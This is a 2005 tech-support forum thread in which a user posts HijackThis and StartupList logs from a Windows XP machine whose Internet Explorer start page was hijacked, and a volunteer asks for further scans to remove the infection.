Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Help me with http://rl.webtracer.cc/-/?bayzm


  • Please log in to reply

#1
Buffelberra

Buffelberra

    New Member

  • Member
  • Pip
  • 8 posts
I can't get rid of http://rl.webtracer.cc/-/?bayzm as startpage in Internet Explorer 6.0
I've tried almost "everything" and also checked all the topics about it, but it still doesn't work :tazz: . And i also have some problems with some url's in "favorites". they are impossible to delete (i didn't add them). Everytime i reboot my computer it's back. However...here's my HijackThis Log:

Logfile of HijackThis v1.99.1
Scan saved at 13:44:52, on 2005-06-12
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\SYSTEM32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\SYSTEM32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program\Adobe\Adobe Acrobat 6.0\Distillr\acrotray.exe
C:\Program\Common\Bin\WinCinemaMgr.exe
C:\Program\F-Secure\Anti-Virus\fsgk32st.exe
C:\Program\F-Secure\Anti-Virus\FSGK32.EXE
C:\Program\F-Secure\BackWeb\7681197\program\fsbwsys.exe
C:\Program\F-Secure\Common\FSMA32.EXE
C:\Program\F-Secure\Anti-Virus\fssm32.exe
C:\Program\F-Secure\Common\FSMB32.EXE
C:\WINDOWS\System32\snmp.exe
C:\WINDOWS\System32\svchost.exe
C:\Program\F-Secure\Common\FCH32.EXE
C:\Program\F-Secure\Common\FAMEH32.EXE
C:\Program\F-Secure\Common\FNRB32.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\Program\F-Secure\Common\FIH32.EXE
C:\Program\F-Secure\Anti-Virus\fsav32.exe
C:\Program\F-Secure\FWES\Program\fsdfwd.exe
C:\PROGRAM\MOZILL~1\FIREFOX.EXE
C:\Documents and Settings\Vimo\Skrivbord\hijack this\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://rl.webtracer.cc/-/?bayzm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://rl.webtracer.cc/-/?bayzm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Länkar
O1 - Hosts: 1159680172 auto.search.msn.com
O4 - Global Startup: Acrobat Assistant.lnk = C:\Program\Adobe\Adobe Acrobat 6.0\Distillr\acrotray.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program\Vanliga filer\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Program\Common\Bin\WinCinemaMgr.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program\Microsoft Office\Office\OSA9.EXE
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program\Java\j2re1.4.2\bin\npjpi142.dll
O9 - Extra 'Tools' menuitem: Sun Java-konsol - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program\Java\j2re1.4.2\bin\npjpi142.dll
O9 - Extra button: Spyware Doctor - {2D663D1A-8670-49D9-A1A5-4C56B4E14E84} - C:\Program\SPYWAR~1\tools\iesdpb.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program\Messenger\msmsgs.exe
O19 - User stylesheet: C:\WINDOWS\stsheets.dat
O23 - Service: AdobeVersionCue - Adobe Sytems - C:\Program\Adobe\Adobe Version Cue\service\VersionCue.exe
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\SYSTEM32\ati2sgag.exe
O23 - Service: F-Secure Automatic Update (BackWeb Client - 7681197) - Unknown owner - C:\Program\F-Secure\BackWeb\7681197\Program\SERVIC~1.EXE
O23 - Service: F-Secure Gatekeeper Handler Starter - F-Secure Corp. - C:\Program\F-Secure\Anti-Virus\fsgk32st.exe
O23 - Service: F-Secure Network Request Broker - F-Secure Corporation - C:\Program\F-Secure\Common\FNRB32.EXE
O23 - Service: fsbwsys - F-Secure Corp. - C:\Program\F-Secure\BackWeb\7681197\program\fsbwsys.exe
O23 - Service: F-Secure Anti-Virus Firewall Daemon (FSDFWD) - F-Secure Corporation - C:\Program\F-Secure\FWES\Program\fsdfwd.exe
O23 - Service: F-Secure Management Agent (FSMA) - F-Secure Corporation - C:\Program\F-Secure\Common\FSMA32.EXE
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program\VANLIG~1\SONYSH~1\AVLib\Sptisrv.exe

Please help me someone, i would be VERY thankful.
  • 0

Advertisements


#2
Wizard

Wizard

    Retired Staff

  • Retired Staff
  • 5,661 posts
Hi Buffelberra and Welcome to Geeks to Go!

Please do the following Scans and Post the Results!

A Hijackthis StartUp Log:
Open HijackThis,Select Config(Bottom Right)>>>Select Misc Tools>>> Select Generate StartUpList log and make sure that both Boxes beside it are checked:

Put a check by:
List all minor sections(Full)
and
List Empty Sections(Complete)

It will produce a NotePad Page,I need you to post the entire contents of that page to the next post!

Atribunes Find.Zip,Designed just for this Infection:
http://www.atribune....nloads/find.zip
Unzip and make sure to Extract All Files!

Double Click Find.bat and let it scan the PC,takes only seconds!!
Look back in the Find Folder and locate Report.txt

Double Click Report.txt and Copy&Paste the entire contents in the next post!
  • 0

#3
Buffelberra

Buffelberra

    New Member

  • Topic Starter
  • Member
  • Pip
  • 8 posts
Thanks very much for helping me! I've been looking everywhere to get rid of this [bleep]. However... Here's the startup list:

StartupList report, 2005-06-12, 21:00:35
StartupList version: 1.52.2
Started from : C:\Documents and Settings\Vimo\Skrivbord\hijack this\HijackThis.EXE
Detected: Windows XP SP2 (WinNT 5.01.2600)
Detected: Internet Explorer v6.00 SP2 (6.00.2900.2180)
* Using default options
* Including empty and uninteresting sections
* Showing rarely important sections
==================================================

Running processes:

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\SYSTEM32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\SYSTEM32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program\Adobe\Adobe Acrobat 6.0\Distillr\acrotray.exe
C:\Program\Common\Bin\WinCinemaMgr.exe
C:\Program\F-Secure\Anti-Virus\fsgk32st.exe
C:\Program\F-Secure\Anti-Virus\FSGK32.EXE
C:\Program\F-Secure\BackWeb\7681197\program\fsbwsys.exe
C:\Program\F-Secure\Common\FSMA32.EXE
C:\Program\F-Secure\Anti-Virus\fssm32.exe
C:\Program\F-Secure\Common\FSMB32.EXE
C:\WINDOWS\System32\snmp.exe
C:\WINDOWS\System32\svchost.exe
C:\Program\F-Secure\Common\FCH32.EXE
C:\Program\F-Secure\Common\FAMEH32.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\Program\F-Secure\Common\FNRB32.EXE
C:\Program\F-Secure\Common\FIH32.EXE
C:\Program\F-Secure\FWES\Program\fsdfwd.exe
C:\Program\F-Secure\Anti-Virus\fsav32.exe
C:\Program\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Vimo\Skrivbord\hijack this\HijackThis.exe

--------------------------------------------------

Listing of startup folders:

Shell folders Startup:
[C:\Documents and Settings\Vimo\Start-meny\Program\Autostart]
*No files*

Shell folders AltStartup:
*Folder not found*

User shell folders Startup:
*Folder not found*

User shell folders AltStartup:
*Folder not found*

Shell folders Common Startup:
[C:\Documents and Settings\All Users\Start-meny\Program\Autostart]
Acrobat Assistant.lnk = C:\Program\Adobe\Adobe Acrobat 6.0\Distillr\acrotray.exe
Adobe Gamma Loader.lnk = C:\Program\Vanliga filer\Adobe\Calibration\Adobe Gamma Loader.exe
InterVideo WinCinema Manager.lnk = C:\Program\Common\Bin\WinCinemaMgr.exe
Microsoft Office.lnk = C:\Program\Microsoft Office\Office\OSA9.EXE

Shell folders Common AltStartup:
*Folder not found*

User shell folders Common Startup:
*Folder not found*

User shell folders Alternate Common Startup:
*Folder not found*

--------------------------------------------------

Checking Windows NT UserInit:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
UserInit = C:\WINDOWS\system32\userinit.exe,

[HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon]
*Registry key not found*

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
*Registry value not found*

[HKCU\Software\Microsoft\Windows\CurrentVersion\Winlogon]
*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run
*Registry key not found*

--------------------------------------------------

File association entry for .EXE:
HKEY_CLASSES_ROOT\exefile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .COM:
HKEY_CLASSES_ROOT\comfile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .BAT:
HKEY_CLASSES_ROOT\batfile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .PIF:
HKEY_CLASSES_ROOT\piffile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .SCR:
HKEY_CLASSES_ROOT\scrfile\shell\open\command

(Default) = "%1" /S

--------------------------------------------------

File association entry for .HTA:
HKEY_CLASSES_ROOT\htafile\shell\open\command

(Default) = C:\WINDOWS\System32\mshta.exe "%1" %*

--------------------------------------------------

File association entry for .TXT:
HKEY_CLASSES_ROOT\txtfile\shell\open\command

(Default) = %SystemRoot%\system32\NOTEPAD.EXE %1

--------------------------------------------------

Enumerating Active Setup stub paths:
HKLM\Software\Microsoft\Active Setup\Installed Components
(* = disabled by HKCU twin)

[>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
StubPath = C:\WINDOWS\inf\unregmp2.exe /ShowWMP

[>{26923b43-4d38-484f-9b9e-de460746276c}] *
StubPath = %systemroot%\system32\shmgrate.exe OCInstallUserConfigIE

[>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}] *
StubPath = %systemroot%\system32\shmgrate.exe OCInstallUserConfigOE

[{2C7339CF-2B09-4501-B3F3-F3508C9228ED}] *
StubPath = %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll

[{44BBA840-CC51-11CF-AAFA-00AA00B6015C}] *
StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install

[{44BBA842-CC51-11CF-AAFA-00AA00B6015B}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT

[{5945c046-1e7d-11d1-bc44-00c04fd912be}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser

[{6BF52A52-394A-11d3-B153-00C04F79FAA6}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp.inf,PerUserStub

[{7790769C-0471-11d2-AF11-00C04FA35D02}] *
StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install

[{89820200-ECBD-11cf-8B85-00AA005B4340}] *
StubPath = regsvr32.exe /s /n /i:U shell32.dll

[{89820200-ECBD-11cf-8B85-00AA005B4383}] *
StubPath = %SystemRoot%\System32\ie4uinit.exe

[{9EF0045A-CDD9-438e-95E6-02B9AFEC8E11}] *
StubPath = %SystemRoot%\System32\updcrl.exe -e -u %SystemRoot%\System32\verisignpub1.crl

[{CA0A4247-44BE-11d1-A005-00805F8ABE06}] *
StubPath = RunDLL setupx.dll,InstallHinfSection PowerCfg.user 0 powercfg.inf

--------------------------------------------------

Enumerating ICQ Agent Autostart apps:
HKCU\Software\Mirabilis\ICQ\Agent\Apps

*Registry key not found*

--------------------------------------------------

Load/Run keys from C:\WINDOWS\WIN.INI:

load=*INI section not found*
run=*INI section not found*

Load/Run keys from Registry:

HKLM\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found*
HKLM\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found*
HKLM\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found*
HKCU\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found*
HKCU\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found*
HKCU\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found*
HKCU\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found*
HKCU\..\Windows NT\CurrentVersion\Windows: load=
HKCU\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: load=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: AppInit_DLLs=

--------------------------------------------------

Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:

Shell=*INI section not found*
SCRNSAVE.EXE=*INI section not found*
drivers=*INI section not found*

Shell & screensaver key from Registry:

Shell=Explorer.exe
SCRNSAVE.EXE=C:\WINDOWS\System32\logon.scr
drivers=*Registry value not found*

Policies Shell key:

HKCU\..\Policies: Shell=*Registry key not found*
HKLM\..\Policies: Shell=*Registry value not found*

--------------------------------------------------

Checking for EXPLORER.EXE instances:

C:\WINDOWS\Explorer.exe: PRESENT!

C:\Explorer.exe: not present
C:\WINDOWS\Explorer\Explorer.exe: not present
C:\WINDOWS\System\Explorer.exe: not present
C:\WINDOWS\System32\Explorer.exe: not present
C:\WINDOWS\Command\Explorer.exe: not present
C:\WINDOWS\Fonts\Explorer.exe: not present

--------------------------------------------------

Checking for superhidden extensions:

.lnk: HIDDEN! (arrow overlay: yes)
.pif: HIDDEN! (arrow overlay: yes)
.exe: not hidden
.com: not hidden
.bat: not hidden
.hta: not hidden
.scr: not hidden
.shs: HIDDEN!
.shb: HIDDEN!
.vbs: not hidden
.vbe: not hidden
.wsh: not hidden
.scf: HIDDEN! (arrow overlay: NO!)
.url: HIDDEN! (arrow overlay: yes)
.js: not hidden
.jse: not hidden

--------------------------------------------------

Verifying REGEDIT.EXE integrity:

- Regedit.exe found in C:\WINDOWS
- .reg open command is normal (regedit.exe %1)
- Company name OK: 'Microsoft Corporation'
- Original filename OK: 'REGEDIT.EXE'
- File description: 'Registereditorn'

Registry check passed

--------------------------------------------------

Enumerating Browser Helper Objects:

*No BHO's found*

--------------------------------------------------

Enumerating Task Scheduler jobs:

Starta optimering.job

--------------------------------------------------

Enumerating Download Program Files:

[Microsoft XML Parser for Java]
CODEBASE = file://C:\WINDOWS\Java\classes\xmldso4.cab
OSD = C:\WINDOWS\Downloaded Program Files\Microsoft XML Parser for Java.osd

[Shockwave ActiveX Control]
InProcServer32 = C:\WINDOWS\SYSTEM32\MACROMED\DIRECTOR\SWDIR.DLL
CODEBASE = http://download.macr...director/sw.cab

--------------------------------------------------

Enumerating Winsock LSP files:

NameSpace #1: C:\WINDOWS\System32\mswsock.dll
NameSpace #2: C:\WINDOWS\System32\winrnr.dll
NameSpace #3: C:\WINDOWS\System32\mswsock.dll
Protocol #1: C:\WINDOWS\system32\mswsock.dll
Protocol #2: C:\WINDOWS\system32\mswsock.dll
Protocol #3: C:\WINDOWS\system32\mswsock.dll
Protocol #4: C:\WINDOWS\system32\mswsock.dll
Protocol #5: C:\WINDOWS\system32\rsvpsp.dll
Protocol #6: C:\WINDOWS\system32\rsvpsp.dll
Protocol #7: C:\WINDOWS\system32\mswsock.dll
Protocol #8: C:\WINDOWS\system32\mswsock.dll
Protocol #9: C:\WINDOWS\system32\mswsock.dll
Protocol #10: C:\WINDOWS\system32\mswsock.dll
Protocol #11: C:\WINDOWS\system32\mswsock.dll
Protocol #12: C:\WINDOWS\system32\mswsock.dll
Protocol #13: C:\WINDOWS\system32\mswsock.dll
Protocol #14: C:\WINDOWS\system32\mswsock.dll

--------------------------------------------------

Enumerating Windows NT/2000/XP services

Microsoft ACPI Driver: System32\DRIVERS\ACPI.sys (system)
Aureal Game Port Enumerator: System32\DRIVERS\admjoy.sys (manual start)
AdobeVersionCue: C:\Program\Adobe\Adobe Version Cue\service\VersionCue.exe (manual start)
Microsoft Kernel Acoustic Echo Canceller: system32\drivers\aec.sys (manual start)
AFD Networking Support Environment: \SystemRoot\System32\drivers\afd.sys (system)
Alerter: %SystemRoot%\System32\svchost.exe -k LocalService (disabled)
Application Layer Gateway Service: %SystemRoot%\System32\alg.exe (manual start)
AMD K7-processordrivrutin: System32\DRIVERS\amdk7.sys (system)
Application Management: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
RAS Asynchronous Media Driver: System32\DRIVERS\asyncmac.sys (manual start)
Standard-IDE/ESDI-hårddiskstyrenhet: System32\DRIVERS\atapi.sys (system)
Ati HotKey Poller: %SystemRoot%\System32\Ati2evxx.exe (autostart)
ATI Smart: C:\WINDOWS\SYSTEM32\ati2sgag.exe (autostart)
ati2mtag: System32\DRIVERS\ati2mtag.sys (manual start)
ATM ARP Client Protocol: System32\DRIVERS\atmarpc.sys (manual start)
Windows Audio: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Ljud-stub-drivrutin: System32\DRIVERS\audstub.sys (manual start)
F-Secure Automatic Update: C:\Program\F-Secure\BackWeb\7681197\Program\SERVIC~1.EXE (autostart)
Background Intelligent Transfer Service: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Computer Browser: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Closed Caption Decoder: System32\DRIVERS\CCDECODE.sys (manual start)
CD-ROM-drivrutin: System32\DRIVERS\cdrom.sys (system)
Indexing Service: C:\WINDOWS\System32\cisvc.exe (manual start)
ClipBook: %SystemRoot%\system32\clipsrv.exe (disabled)
C-Media WDM Audio Interface: system32\drivers\cmuda.sys (manual start)
COM+ System Application: C:\WINDOWS\System32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} (manual start)
Cryptographic Services: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
d347bus: System32\DRIVERS\d347bus.sys (system)
d347prt: System32\Drivers\d347prt.sys (system)
PCTV USB2 2821 Capture: System32\DRIVERS\emDevice.sys (manual start)
DCOM Server Process Launcher: %SystemRoot%\system32\svchost -k DcomLaunch (autostart)
DHCP Client: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Diskdrivrutin: System32\DRIVERS\disk.sys (system)
Logical Disk Manager Administrative Service: %SystemRoot%\System32\dmadmin.exe /com (manual start)
dmboot: System32\drivers\dmboot.sys (disabled)
Logical Disk Manager Driver: System32\drivers\dmio.sys (system)
dmload: System32\drivers\dmload.sys (system)
Logical Disk Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Microsoft Kernel DLS Syntheiszer: system32\drivers\DMusic.sys (manual start)
DNS Client: %SystemRoot%\System32\svchost.exe -k NetworkService (autostart)
Microsoft Kernel DRM Audio Descrambler: system32\drivers\drmkaud.sys (manual start)
PCTV USB2 2821 Audio: system32\drivers\emAudio.sys (manual start)
Error Reporting Service: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Event Log: %SystemRoot%\system32\services.exe (autostart)
COM+ Event System: C:\WINDOWS\System32\svchost.exe -k netsvcs (manual start)
F-Secure File System Filter: \??\C:\Program\F-Secure\Anti-Virus\Win2K\FSfilter.sys (autostart)
F-Secure Gatekeeper: \??\C:\Program\F-Secure\Anti-Virus\Win2K\FSgk.sys (autostart)
F-Secure Gatekeeper Handler Starter: "C:\Program\F-Secure\Anti-Virus\fsgk32st.exe" (autostart)
F-Secure Network Request Broker: "C:\Program\F-Secure\Common\FNRB32.EXE" (manual start)
F-Secure File System Recognizer: \??\C:\Program\F-Secure\Anti-Virus\Win2K\FSrec.sys (autostart)
Fast User Switching Compatibility: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Drivrutin för diskettstyrenhet: System32\DRIVERS\fdc.sys (manual start)
USB Device Lower Filter: System32\DRIVERS\emFilter.sys (manual start)
Diskettdrivrutin: System32\DRIVERS\flpydisk.sys (manual start)
FltMgr: system32\drivers\fltmgr.sys (system)
fsbwsys: "C:\Program\F-Secure\BackWeb\7681197\program\fsbwsys.exe" (autostart)
F-Secure Anti-Virus Firewall Daemon: "C:\Program\F-Secure\FWES\Program\fsdfwd.exe" (manual start)
F-Secure Firewall Driver: System32\drivers\fsdfw.sys (system)
F-Secure Management Agent: "C:\Program\F-Secure\Common\FSMA32.EXE" (autostart)
Volume Manager Driver: System32\DRIVERS\ftdisk.sys (system)
Spelportsuppräknare: System32\DRIVERS\gameenum.sys (manual start)
Generic Packet Classifier: System32\DRIVERS\msgpc.sys (manual start)
Help and Support: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Aktiverare för Microsoft HID till styrspaksport: System32\DRIVERS\hidgame.sys (manual start)
Human Interface Device Access: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
HTTP: System32\Drivers\HTTP.sys (manual start)
HTTP SSL: %SystemRoot%\System32\svchost.exe -k HTTPFilter (manual start)
Drivrutin för i8042-tangentbord och PS/2-musport: System32\DRIVERS\i8042prt.sys (system)
CD-Burning Filter Driver: system32\DRIVERS\imapi.sys (system)
IMAPI CD-Burning COM Service: C:\WINDOWS\System32\imapi.exe (manual start)
IPv6 Windows Firewall Driver: system32\drivers\ip6fw.sys (manual start)
IP Traffic Filter Driver: System32\DRIVERS\ipfltdrv.sys (manual start)
IP in IP Tunnel Driver: System32\DRIVERS\ipinip.sys (manual start)
IP Network Address Translator: System32\DRIVERS\ipnat.sys (manual start)
IPSEC driver: System32\DRIVERS\ipsec.sys (system)
IrDA Protocol: System32\DRIVERS\irda.sys (autostart)
Tjänst för IR-uppräkning: System32\DRIVERS\irenum.sys (manual start)
Infrared Monitor: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Microsoft Serial Infrared Driver: System32\DRIVERS\irsir.sys (manual start)
PnP ISA/EISA Bus Driver: System32\DRIVERS\isapnp.sys (system)
jatmlano: \??\C:\DOCUME~1\Viktor\LOKALA~1\Temp\jatmlano.sys (manual start)
Tangentbordsklassdrivrutin: System32\DRIVERS\kbdclass.sys (system)
Microsoft Kernel-wave-ljudMixer: system32\drivers\kmixer.sys (manual start)
Server: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Workstation: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
TCP/IP NetBIOS Helper: %SystemRoot%\System32\svchost.exe -k LocalService (autostart)
Logitech USB Monitor Filter: system32\DRIVERS\LVUSBSta.sys (manual start)
Messenger: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
NetMeeting Remote Desktop Sharing: C:\WINDOWS\System32\mnmsrvc.exe (manual start)
Musklassdrivrutin: System32\DRIVERS\mouclass.sys (system)
Klientomdirigerare för WebDav: System32\DRIVERS\mrxdav.sys (manual start)
MRXSMB: System32\DRIVERS\mrxsmb.sys (system)
Distributed Transaction Coordinator: C:\WINDOWS\System32\msdtc.exe (manual start)
Windows Installer: C:\WINDOWS\system32\msiexec.exe /V (manual start)
Tjänstproxy för Microsoft-direktuppspelning: system32\drivers\MSKSSRV.sys (manual start)
Klockproxy för Microsoft-direktuppspelning: system32\drivers\MSPCLOCK.sys (manual start)
Kvalitetshanteringsproxy för Microsoft-direktuppspelning: system32\drivers\MSPQM.sys (manual start)
Microsoft System Management BIOS Driver: System32\DRIVERS\mssmbios.sys (manual start)
Microsoft Streaming Tee/Sink-to-Sink Converter: system32\drivers\MSTEE.sys (manual start)
Drivrutin för Microsoft MPU-401 MIDI UART: system32\drivers\msmpu401.sys (manual start)
NABTS/FEC VBI Codec: System32\DRIVERS\NABTSFEC.sys (manual start)
ndisi: \??\C:\WINDOWS\System32\drivers\ndisi.sys (autostart)
Microsoft TV/Video Connection: System32\DRIVERS\NdisIP.sys (manual start)
Remote Access NDIS TAPI Driver: System32\DRIVERS\ndistapi.sys (manual start)
NDIS-protokoll för I/O i användarläge: System32\DRIVERS\ndisuio.sys (manual start)
Remote Access NDIS WAN Driver: System32\DRIVERS\ndiswan.sys (manual start)
NetBIOS-gränssnitt: System32\DRIVERS\netbios.sys (system)
NetBios over Tcpip: System32\DRIVERS\netbt.sys (system)
Network DDE: %SystemRoot%\system32\netdde.exe (disabled)
Network DDE DSDM: %SystemRoot%\system32\netdde.exe (disabled)
Net Logon: %SystemRoot%\System32\lsass.exe (manual start)
Network Connections: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Net MD: System32\Drivers\NETMDUSB.sys (manual start)
Network Location Awareness (NLA): %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Drivrutin för Gravis-spelportenhet: system32\drivers\ntgrip.sys (manual start)
NT LM Security Support Provider: %SystemRoot%\System32\lsass.exe (manual start)
Removable Storage: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
IPX Traffic Filter Driver: System32\DRIVERS\nwlnkflt.sys (manual start)
IPX Traffic Forwarder Driver: System32\DRIVERS\nwlnkfwd.sys (manual start)
Drivrutin för parallellport: System32\DRIVERS\parport.sys (manual start)
PCI Bus Driver: System32\DRIVERS\pci.sys (system)
PCIIde: System32\DRIVERS\pciide.sys (system)
Padus ASPI Shell: \??\C:\WINDOWS\System32\drivers\pfc.sys (manual start)
Labtec WebCam(PID_0928): system32\DRIVERS\LV561AV.SYS (manual start)
Plug and Play: %SystemRoot%\system32\services.exe (autostart)
IPSEC Services: %SystemRoot%\System32\lsass.exe (autostart)
WAN Miniport (PPTP): System32\DRIVERS\raspptp.sys (manual start)
Processordrivrutin: System32\DRIVERS\processr.sys (system)
Protected Storage: %SystemRoot%\system32\lsass.exe (autostart)
